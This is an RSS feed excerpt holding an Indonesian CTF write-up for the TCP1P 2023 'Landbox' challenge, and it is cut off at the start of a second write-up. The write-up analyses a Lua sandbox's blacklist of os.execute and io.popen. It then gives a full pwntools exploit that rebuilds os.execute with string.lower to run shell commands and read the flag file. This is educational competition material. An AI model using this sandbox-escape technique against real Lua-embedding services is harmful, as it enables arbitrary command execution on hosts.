Forem: Edqe14 The latest articles on Forem by Edqe14 (@edqe14). https://forem.com/edqe14 https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F726662%2F04249196-e889-45af-bbcb-f47dfbe0a59c.png Forem: Edqe14 https://forem.com/edqe14 en TCP1P CTF β€” Landbox Edqe14 Tue, 17 Oct 2023 04:42:40 +0000 https://forem.com/edqe14/tcp1p-ctf-landbox-4h5b https://forem.com/edqe14/tcp1p-ctf-landbox-4h5b <p>Halo teman-teman hackerπŸ‘‹! Di artikel ini, kita akan membahas terkait tentang sebuah <em>chall(enge)</em> dari <a href="https://ctf.tcp1p.com/">TCP1P CTF 2023</a>, yang berjudul: <a href="https://ctf.tcp1p.com/challenges#Landbox-269">Landbox</a>.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--UDjtihqO--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5x3w2pl195luagzqsp00.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--UDjtihqO--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5x3w2pl195luagzqsp00.png" alt="Challenge preview" width="617" height="575"></a></p> <h2> πŸ€” Latar belakang </h2> <p>Jadi, apa sih tantangan satu ini? Dari deskripsinya saja, kita dapat mengetahui bahwa aplikasi ini dibuat dari <a href="https://www.lua.org/">Lua</a>.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--41eMQX3q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sfsplruj5l3caqczypp0.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--41eMQX3q--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sfsplruj5l3caqczypp0.png" alt="Chall description" width="399" height="89"></a></p> <p>Selain itu, kita juga mendapatkan sebuah IP serta port untuk dihubungi dengan <a href="https://sectools.org/tool/netcat/">netcat</a>. Disaat kita terhubung dengan IP tersebut, kita akan mendapat kalimat pengantar untuk tantangan ini. Disini, kita dapat memasukkan kode lua dan dapat diakhiri dengan <code>-- END</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>nc 51.161.84.3 22041 Welcome to Landbox! <span class="o">(</span>LUA Sandbox<span class="o">)</span> Feel free to <span class="nb">type </span>your lua code below, <span class="nb">type</span> <span class="s1">'-- END'</span> once you are <span class="k">done</span> <span class="p">;</span><span class="o">)</span> <span class="nt">--</span> BEGIN print<span class="o">(</span><span class="s1">'hello world'</span><span class="o">)</span> <span class="nt">--</span> END <span class="nt">--</span> OUTPUT BEGIN hello world <span class="nt">--</span> OUTPUT END </code></pre> </div> <blockquote> <p><strong>✏ Yang kita pelajari</strong></p> </blockquote> <ol> <li>Aplikasi ini dibuat dari <a href="https://www.lua.org/">Lua</a>.</li> <li>Aplikasi ini dapat menjalankan kode lua yang dimasukkan ❗</li> </ol> <p>Karena kita hanya mendapat informasi yang terbatas, ayo kita lihat <em>source code</em> yang diberikan.</p> <h2> πŸ‘©β€πŸ’» Source code </h2> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--YHFSlxWo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0hjyh5b68l4tbuziisap.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--YHFSlxWo--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0hjyh5b68l4tbuziisap.png" alt="Source codes" width="416" height="89"></a></p> <p>Dari tantangan ini, kita mendapat 2 <em>file</em>, yaitu <code>main.lua</code> dan sebuah <code>Dockerfile</code>. Mari kita lihat <code>Dockerfile</code>nya terlebih dahulu, karena kita mungkin bisa mendapat informasi lebih seperti: versi lua, lokasi <code>flag.txt</code>, dll.</p> <h3> 🐳 <code>Dockerfile</code> </h3> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">FROM</span><span class="s"> ubuntu:latest</span> <span class="c"># ... dipotong biar lebih singkat</span> <span class="k">RUN </span>apt-get <span class="nt">-y</span> <span class="nb">install </span>lua5.4 socat <span class="c"># ... dipotong biar lebih singkat</span> <span class="k">RUN </span><span class="nb">chown </span>root:root /flag.txt <span class="k">RUN </span><span class="nb">mv</span> /flag.txt /flag-<span class="sb">`</span><span class="nb">md5sum</span> /flag.txt | <span class="nb">awk</span> <span class="s1">'{print $1}'</span><span class="sb">`</span>.txt <span class="c"># ... dipotong biar lebih singkat</span> </code></pre> </div> <blockquote> <p><strong>✏ Yang kita pelajari</strong></p> </blockquote> <ol> <li>Versi lua yang dipakai adalah versi 5.4,</li> <li>File <code>flag.txt</code> diubah menjadi <code>flag-&lt;hash md5 flag&gt;.txt</code>.</li> </ol> <p>Nah, sekarang yang telah ditunggu-tunggu...</p> <h3> βš™ <code>main.lua</code> </h3> <p>Yang pertama kita lihat setelah membuka <em>file</em> ini yaitu sebuah <em>function</em> untuk menjalankan kode yang kita <em>input</em>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight lua"><code><span class="k">function</span> <span class="nf">run</span><span class="p">(</span><span class="n">untrusted_code</span><span class="p">)</span> <span class="n">env</span><span class="p">[</span><span class="s1">'string'</span><span class="p">][</span><span class="s1">'char'</span><span class="p">]</span> <span class="o">=</span> <span class="k">function</span><span class="p">()</span> <span class="k">end</span> <span class="n">env</span><span class="p">[</span><span class="s1">'string'</span><span class="p">][</span><span class="s1">'format'</span><span class="p">]</span> <span class="o">=</span> <span class="k">function</span><span class="p">()</span> <span class="k">end</span> <span class="n">env</span><span class="p">[</span><span class="s1">'string'</span><span class="p">][</span><span class="s1">'gsub'</span><span class="p">]</span> <span class="o">=</span> <span class="k">function</span><span class="p">()</span> <span class="k">end</span> <span class="n">env</span><span class="p">[</span><span class="s1">'string'</span><span class="p">][</span><span class="s1">'sub'</span><span class="p">]</span> <span class="o">=</span> <span class="k">function</span><span class="p">()</span> <span class="k">end</span> <span class="kd">local</span> <span class="n">res</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="nb">load</span><span class="p">(</span><span class="n">untrusted_code</span><span class="p">,</span> <span class="kc">nil</span><span class="p">,</span> <span class="s1">'t'</span><span class="p">,</span> <span class="n">env</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">res</span> <span class="k">then</span> <span class="nb">print</span><span class="p">(</span><span class="s1">'Error: '</span> <span class="o">..</span> <span class="n">err</span><span class="p">)</span> <span class="k">return</span> <span class="kc">nil</span><span class="p">,</span> <span class="n">err</span> <span class="k">end</span> <span class="k">return</span> <span class="nb">pcall</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="k">end</span> <span class="c1">-- ... dipotong biar lebih singkat</span> <span class="kd">local</span> <span class="n">res</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">run</span><span class="p">(</span><span class="n">code</span><span class="p">)</span> <span class="c1">-- ... dipotong biar lebih singkat</span> </code></pre> </div> <p>Sekarang, kita punya tujuan untuk membuat sebuah <em>payload</em> untuk mendapatkan <em>flag</em> dari tantangan ini. Namun, sebelum itu, kita harus melewati 3 pengecekan yaitu:</p> <blockquote> <p>πŸ₯‡ <em>1st check</em><br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight lua"><code><span class="n">blacklist</span> <span class="o">=</span> <span class="p">{</span><span class="s1">'os.execute'</span><span class="p">,</span> <span class="s1">'execute'</span><span class="p">,</span> <span class="s1">'io.popen'</span><span class="p">,</span> <span class="s1">'popen'</span><span class="p">,</span> <span class="s1">'package.loadlib'</span><span class="p">,</span> <span class="s1">'loadlib'</span><span class="p">}</span> <span class="k">for</span> <span class="n">line</span> <span class="k">in</span> <span class="n">code</span><span class="p">:</span><span class="n">gmatch</span><span class="p">(</span><span class="s2">"[^\n]+"</span><span class="p">)</span> <span class="k">do</span> <span class="k">for</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span> <span class="o">#</span><span class="n">blacklist</span> <span class="k">do</span> <span class="k">if</span> <span class="nb">string.find</span><span class="p">(</span><span class="n">line</span><span class="p">,</span> <span class="n">blacklist</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="k">then</span> <span class="nb">print</span><span class="p">(</span><span class="s1">'No! bad code!'</span><span class="p">)</span> <span class="k">return</span> <span class="k">end</span> <span class="k">end</span> <span class="k">end</span> </code></pre> </div> <p>Dari penggalan kode ini, kode yang kita <em>input</em> tidak boleh mengandung kata-kata yang didalam <code>blacklist</code> atau kita tidak dapat melanjutkan ke <em>step</em> kedua.</p> <blockquote> <p>πŸ₯ˆ <em>2nd check</em><br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight lua"><code><span class="n">sanitized</span> <span class="o">=</span> <span class="nb">string.gsub</span><span class="p">(</span><span class="n">code</span><span class="p">,</span> <span class="s1">'%W'</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span> <span class="n">sanitized</span> <span class="o">=</span> <span class="nb">string.gsub</span><span class="p">(</span><span class="n">sanitized</span><span class="p">,</span> <span class="s1">'%d'</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span> <span class="o">#</span><span class="n">blacklist</span> <span class="k">do</span> <span class="k">if</span> <span class="nb">string.find</span><span class="p">(</span><span class="n">sanitized</span><span class="p">,</span> <span class="n">blacklist</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="k">then</span> <span class="nb">print</span><span class="p">(</span><span class="s1">'No! bad code!'</span><span class="p">)</span> <span class="k">return</span> <span class="k">end</span> <span class="kd">local</span> <span class="n">parts</span> <span class="o">=</span> <span class="p">{}</span> <span class="k">for</span> <span class="n">part</span> <span class="k">in</span> <span class="n">sanitized</span><span class="p">:</span><span class="n">gmatch</span><span class="p">(</span><span class="s2">"0x%x?%x"</span><span class="p">)</span> <span class="k">do</span> <span class="nb">table.insert</span><span class="p">(</span><span class="n">parts</span><span class="p">,</span> <span class="n">part</span><span class="p">)</span> <span class="k">end</span> <span class="kd">local</span> <span class="n">result</span> <span class="o">=</span> <span class="s1">''</span> <span class="k">for</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span> <span class="o">#</span><span class="n">parts</span> <span class="k">do</span> <span class="n">result</span> <span class="o">=</span> <span class="n">result</span> <span class="o">..</span> <span class="nb">string.char</span><span class="p">(</span><span class="nb">tonumber</span><span class="p">(</span><span class="n">parts</span><span class="p">[</span><span class="n">j</span><span class="p">]:</span><span class="n">sub</span><span class="p">(</span><span class="mi">3</span><span class="p">),</span> <span class="mi">16</span><span class="p">))</span> <span class="k">end</span> <span class="k">if</span> <span class="nb">string.find</span><span class="p">(</span><span class="n">result</span><span class="p">,</span> <span class="n">blacklist</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="k">then</span> <span class="nb">print</span><span class="p">(</span><span class="s1">'No! bad code!'</span><span class="p">)</span> <span class="k">return</span> <span class="k">end</span> <span class="k">end</span> </code></pre> </div> <p>Waduuh, yang kedua ini lebih kompleks dari pada yang pertama. Tapi, sebenarnya tidak sesusah itu. Kode <code>string.gsub</code> ini, berdasarkan <a href="https://www.lua.org/pil/20.1.html">dokumentasi lua</a>, digunakan untuk mengubah semua karakter yang cocok dengan karakter yang baru.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight lua"><code><span class="n">sanitized</span> <span class="o">=</span> <span class="nb">string.gsub</span><span class="p">(</span><span class="n">code</span><span class="p">,</span> <span class="s1">'%W'</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span> <span class="n">sanitized</span> <span class="o">=</span> <span class="nb">string.gsub</span><span class="p">(</span><span class="n">sanitized</span><span class="p">,</span> <span class="s1">'%d'</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span> </code></pre> </div> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--MK50eCFY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xphmb6tedgyuscaa7s8a.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--MK50eCFY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xphmb6tedgyuscaa7s8a.png" alt="Pattern matcher" width="343" height="284"></a></p> <p>Seperti digambar, <code>sanitized</code> ini adalah hasil dari fungsi <code>string.gsub</code>. Di <code>gsub</code> pertama, ternyata ada bug yang mungkin awalnya membuat kita bingung, yaitu <em>pattern</em> <code>%W</code>. Sesuai dari tabel <em>pattern</em> diatas, <code>%W</code> seharusnya menghapus semua karakter <strong><em>alphanumeric</em></strong>, namun karena <em>pattern</em> ini <strong><em>case-sensitive</em></strong>, huruf kapital <code>W</code> ini tidak melakukan apa-apa. Sedangkan yang <code>sanitized</code> kedua, ini akan menghapus semua angka dari kode kita.</p> <p>Ada juga kode yang mengubah karakter hexadesimal menjadi karakter yang dapat dicek dengan <em>list blacklist</em>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight lua"><code><span class="kd">local</span> <span class="n">parts</span> <span class="o">=</span> <span class="p">{}</span> <span class="k">for</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span> <span class="o">#</span><span class="n">parts</span> <span class="k">do</span> <span class="n">result</span> <span class="o">=</span> <span class="n">result</span> <span class="o">..</span> <span class="nb">string.char</span><span class="p">(</span><span class="nb">tonumber</span><span class="p">(</span><span class="n">parts</span><span class="p">[</span><span class="n">j</span><span class="p">]:</span><span class="n">sub</span><span class="p">(</span><span class="mi">3</span><span class="p">),</span> <span class="mi">16</span><span class="p">))</span> <span class="k">end</span> </code></pre> </div> <p>Sama seperti <em>step</em> pertama, hasil yang didapatkan akan dicek kembali dengan <em>list blacklist</em>.</p> <blockquote> <p>πŸ₯‰ <em>3rd check</em><br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight lua"><code><span class="kd">local</span> <span class="n">result</span> <span class="o">=</span> <span class="p">{}</span> <span class="k">for</span> <span class="n">match</span> <span class="k">in</span> <span class="n">code</span><span class="p">:</span><span class="n">gmatch</span><span class="p">(</span><span class="s2">"['\"</span><span class="p">](.</span><span class="o">-</span><span class="p">)[</span><span class="s1">'</span><span class="se">\"</span><span class="s1">]") do table.insert(result, match) end local sanitized = '' for i = 1, #result do sanitized = sanitized .. result[i] end for i = 1, #blacklist do if string.find(sanitized, blacklist[i]) then print('</span><span class="n">No</span><span class="err">!</span> <span class="n">bad</span> <span class="n">code</span><span class="err">!</span><span class="s1">') return end local parts = {} for part in sanitized:gmatch("\\x%x%x") do table.insert(parts, part) end local result = '' for j = 1, #parts do result = result .. string.char(tonumber(parts[j]:sub(3), 16)) end if string.find(result, blacklist[i]) then print('</span><span class="n">No</span><span class="err">!</span> <span class="n">bad</span> <span class="n">code</span><span class="err">!</span><span class="s1">') return end end </span></code></pre> </div> <p>Sama seperti pengecekan kedua, disini semua kata didalam petik akan dicek dengan <em>blacklist</em>, juga dengan semua karakter hexadesimal.</p> <blockquote> <p><strong>✏ Yang kita pelajari</strong></p> </blockquote> <ol> <li> <em>Payload</em> kita tidak boleh mengandung kata-kata dalam blacklist,</li> <li>Kita juga tidak bisa menggunakan karakter hexadesimal.</li> </ol> <p>Dengan informasi yang kita dapat, kita sekarang bisa membuat <em>solver</em> untuk tantangan ini.</p> <h2> 🧠 Solver </h2> <p>Aku disini akan pakai Python dengan library <a href="https://github.com/Gallopsled/pwntools#readme"><code>pwntools</code></a>. Ayo, kita buat secara perlahan.</p> <p><strong>Pertama</strong>, kita butuh membuat sebuah <em>interface</em> untuk berkomunikasi dengan servernya.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">import</span> <span class="nn">inspect</span> <span class="k">def</span> <span class="nf">conn</span><span class="p">():</span> <span class="c1"># replace host and port for remote </span> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"localhost"</span><span class="p">,</span> <span class="mi">1337</span><span class="p">)</span> <span class="k">return</span> <span class="n">io</span> </code></pre> </div> <blockquote> <p>β„Ή <strong>Info</strong><br> Kita bisa menjalankan server lokal sendiri menggunakan <code>Dockerfile</code> yang diberikan</p> </blockquote> <p><strong>Kedua</strong>, kita harus membuat kode lua yang dapat menjalankan <em>command</em> atau <em>shell</em> di konsol.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">write</span><span class="p">(</span><span class="n">cmd</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">f</span><span class="s">""" local f=io.open("/tmp/shell.lua", "wb") f:write([[ load(string.lower("OS.EXECUTE") .. "('</span><span class="si">{</span><span class="n">cmd</span><span class="si">}</span><span class="s">')")() ]]) io.close(f) -- END """</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="n">cleandoc</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="k">return</span> <span class="n">payload</span> <span class="k">def</span> <span class="nf">exec</span><span class="p">():</span> <span class="n">payload</span> <span class="o">=</span> <span class="s">""" f = assert(loadfile('/tmp/shell.lua')); f(); -- END """</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="n">cleandoc</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="k">return</span> <span class="n">payload</span> </code></pre> </div> <p>Didalam fungsi <code>write</code>, kita membuat sebuah <em>file</em> di <code>/tmp/shell.lua</code> dengan menggunakan fungsi <code>io.open</code> lua. Kita dapat menggunakan <code>io.open</code> karena yang dilarang itu adalah <code>io.(p)open</code>. Lalu, untuk bisa melewati larangan <code>os.execute</code>, kita dapat menggunakan fungsi <code>string.lower</code> untuk mengubah huruf besar menjadi huruf kecil.</p> <p>Lalu, dalam fungsi <code>exec</code>, kita dapat menjalankan <em>file</em> <code>/temp/shell.lua</code> dengan memanfaatkan fungsi <code>assert</code> dan <code>loadfile</code> dilua.</p> <p><strong>Ketiga</strong> dan yang terakhir, kita dapat menjalankan kedua fungsi diatas dengan 2 koneksi yang berbeda. Dikarenakan <em>file flag</em> diubah, kita harus menjalankan 2 <em>command</em> linux, yaitu: <code>ls</code> dan <code>cat</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">def</span> <span class="nf">send</span><span class="p">(</span><span class="n">cmd</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="k">with</span> <span class="n">conn</span><span class="p">()</span> <span class="k">as</span> <span class="n">io</span><span class="p">:</span> <span class="n">p1</span> <span class="o">=</span> <span class="n">write</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="n">io</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s">"-- BEGIN"</span><span class="p">,</span> <span class="n">p1</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span> <span class="n">io</span><span class="p">.</span><span class="n">recvuntilS</span><span class="p">(</span><span class="sa">b</span><span class="s">"-- OUTPUT END"</span><span class="p">)</span> <span class="k">with</span> <span class="n">conn</span><span class="p">()</span> <span class="k">as</span> <span class="n">io</span><span class="p">:</span> <span class="n">p2</span> <span class="o">=</span> <span class="k">exec</span><span class="p">()</span> <span class="n">io</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s">"-- BEGIN"</span><span class="p">,</span> <span class="n">p2</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span> <span class="n">output</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">recvuntilS</span><span class="p">(</span><span class="sa">b</span><span class="s">"-- OUTPUT END"</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">output</span><span class="p">)</span> <span class="k">return</span> <span class="n">output</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">output</span> <span class="o">=</span> <span class="n">send</span><span class="p">(</span><span class="s">'ls -la /'</span><span class="p">)</span> <span class="n">flag</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s">'flag-(.+).txt'</span><span class="p">,</span> <span class="n">output</span><span class="p">,</span> <span class="n">re</span><span class="p">.</span><span class="n">MULTILINE</span><span class="p">)</span> <span class="n">send</span><span class="p">(</span><span class="s">'cat /flag-{}.txt'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">flag</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span> </code></pre> </div> <blockquote> <p>Berikut adalah <em>script</em> penuhnya<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">import</span> <span class="nn">inspect</span> <span class="k">def</span> <span class="nf">conn</span><span class="p">():</span> <span class="c1"># replace host and port for remote </span> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"localhost"</span><span class="p">,</span> <span class="mi">1337</span><span class="p">)</span> <span class="k">return</span> <span class="n">io</span> <span class="k">def</span> <span class="nf">write</span><span class="p">(</span><span class="n">cmd</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">f</span><span class="s">""" local f=io.open("/tmp/shell.lua", "wb") f:write([[ load(string.lower("OS.EXECUTE") .. "('</span><span class="si">{</span><span class="n">cmd</span><span class="si">}</span><span class="s">')")() ]]) io.close(f) -- END """</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="n">cleandoc</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="k">return</span> <span class="n">payload</span> <span class="k">def</span> <span class="nf">exec</span><span class="p">():</span> <span class="n">payload</span> <span class="o">=</span> <span class="s">""" f = assert(loadfile('/tmp/shell.lua')); f(); -- END """</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="n">cleandoc</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="k">return</span> <span class="n">payload</span> <span class="k">def</span> <span class="nf">send</span><span class="p">(</span><span class="n">cmd</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="k">with</span> <span class="n">conn</span><span class="p">()</span> <span class="k">as</span> <span class="n">io</span><span class="p">:</span> <span class="n">p1</span> <span class="o">=</span> <span class="n">write</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="n">io</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s">"-- BEGIN"</span><span class="p">,</span> <span class="n">p1</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span> <span class="n">io</span><span class="p">.</span><span class="n">recvuntilS</span><span class="p">(</span><span class="sa">b</span><span class="s">"-- OUTPUT END"</span><span class="p">)</span> <span class="k">with</span> <span class="n">conn</span><span class="p">()</span> <span class="k">as</span> <span class="n">io</span><span class="p">:</span> <span class="n">p2</span> <span class="o">=</span> <span class="k">exec</span><span class="p">()</span> <span class="n">io</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s">"-- BEGIN"</span><span class="p">,</span> <span class="n">p2</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span> <span class="n">output</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">recvuntilS</span><span class="p">(</span><span class="sa">b</span><span class="s">"-- OUTPUT END"</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">output</span><span class="p">)</span> <span class="k">return</span> <span class="n">output</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">output</span> <span class="o">=</span> <span class="n">send</span><span class="p">(</span><span class="s">'ls -la /'</span><span class="p">)</span> <span class="n">flag</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s">'flag-(.+).txt'</span><span class="p">,</span> <span class="n">output</span><span class="p">,</span> <span class="n">re</span><span class="p">.</span><span class="n">MULTILINE</span><span class="p">)</span> <span class="n">send</span><span class="p">(</span><span class="s">'cat /flag-{}.txt'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">flag</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre> </div> <p>Saat kita jalankan:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>python ./solver.py <span class="c"># ...</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="nt">--</span> OUTPUT BEGIN total 72 drwxr-xr-x 1 root root 4096 Oct 17 02:31 <span class="nb">.</span> drwxr-xr-x 1 root root 4096 Oct 17 02:31 .. <span class="nt">-rwxr-xr-x</span> 1 root root 0 Oct 17 02:31 .dockerenv lrwxrwxrwx 1 root root 7 Oct 4 02:08 bin -&gt; usr/bin drwxr-xr-x 2 root root 4096 Apr 18 2022 boot drwxr-xr-x 1 root root 4096 Oct 17 02:26 ctf drwxr-xr-x 5 root root 360 Oct 17 02:31 dev drwxr-xr-x 1 root root 4096 Oct 17 02:31 etc <span class="nt">-rwxr--r--</span> 1 root root 47 Oct 17 02:25 flag-cd55f8dcbf9176753d5e91133c78e172.txt drwxr-xr-x 2 root root 4096 Apr 18 2022 home lrwxrwxrwx 1 root root 7 Oct 4 02:08 lib -&gt; usr/lib lrwxrwxrwx 1 root root 9 Oct 4 02:08 lib32 -&gt; usr/lib32 lrwxrwxrwx 1 root root 9 Oct 4 02:08 lib64 -&gt; usr/lib64 lrwxrwxrwx 1 root root 10 Oct 4 02:08 libx32 -&gt; usr/libx32 drwxr-xr-x 2 root root 4096 Oct 4 02:08 media drwxr-xr-x 2 root root 4096 Oct 4 02:08 mnt drwxr-xr-x 2 root root 4096 Oct 4 02:08 opt dr-xr-xr-x 366 root root 0 Oct 17 02:31 proc drwx------ 2 root root 4096 Oct 4 02:12 root drwxr-xr-x 5 root root 4096 Oct 4 02:12 run lrwxrwxrwx 1 root root 8 Oct 4 02:08 sbin -&gt; usr/sbin drwxr-xr-x 2 root root 4096 Oct 4 02:08 srv dr-xr-xr-x 11 root root 0 Oct 17 02:31 sys drwxrwxrwt 1 root root 4096 Oct 17 02:52 tmp drwxr-xr-x 1 root root 4096 Oct 4 02:08 usr drwxr-xr-x 1 root root 4096 Oct 4 02:12 var <span class="nt">--</span> OUTPUT END <span class="c"># ...</span> <span class="o">[</span><span class="k">*</span><span class="o">]</span> <span class="nt">--</span> OUTPUT BEGIN TCP1P<span class="o">{</span>complex_problem_requires_simple_solution<span class="o">}</span><span class="nt">--</span> OUTPUT END </code></pre> </div> <p>πŸŽ‰ Akhirnya kita mendapat flagnya, kawan~<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">TCP1P</span><span class="p">{</span><span class="n">complex_problem_requires_simple_solution</span><span class="p">}</span> </code></pre> </div> <p>Akhir kata, terima kasih untuk membaca write-up ini <code>^v^</code>. Apabila ada kritik atau masukkan, silahkan komen saja dibawah atau email ke <code>hello@edqe.me</code>.</p> <blockquote> <p>πŸ“ Referensi</p> </blockquote> <p>Terima kasih untuk write-up dari <a href="https://github.com/4n86rakam1">4n86rakam1</a> yang menjadi basis dari artikel &amp; write-up ini.</p> tcp1pctf2023 misc TCP1P CTF β€” Nuclei Edqe14 Sun, 15 Oct 2023 15:17:47 +0000 https://forem.com/edqe14/tcp1p-ctf-nuclei-18ad https://forem.com/edqe14/tcp1p-ctf-nuclei-18ad <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Duh9g-2W--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m3nkrxo4q6v7czs4yy52.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Duh9g-2W--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m3nkrxo4q6v7czs4yy52.png" alt="Challenge Preview" width="616" height="638"></a></p> <p>In this challenge, we are presented with a rather simple web page.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--576HJcP8--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1enhugslc78v1zguciun.png" class="article-body-image-wrapper"><img 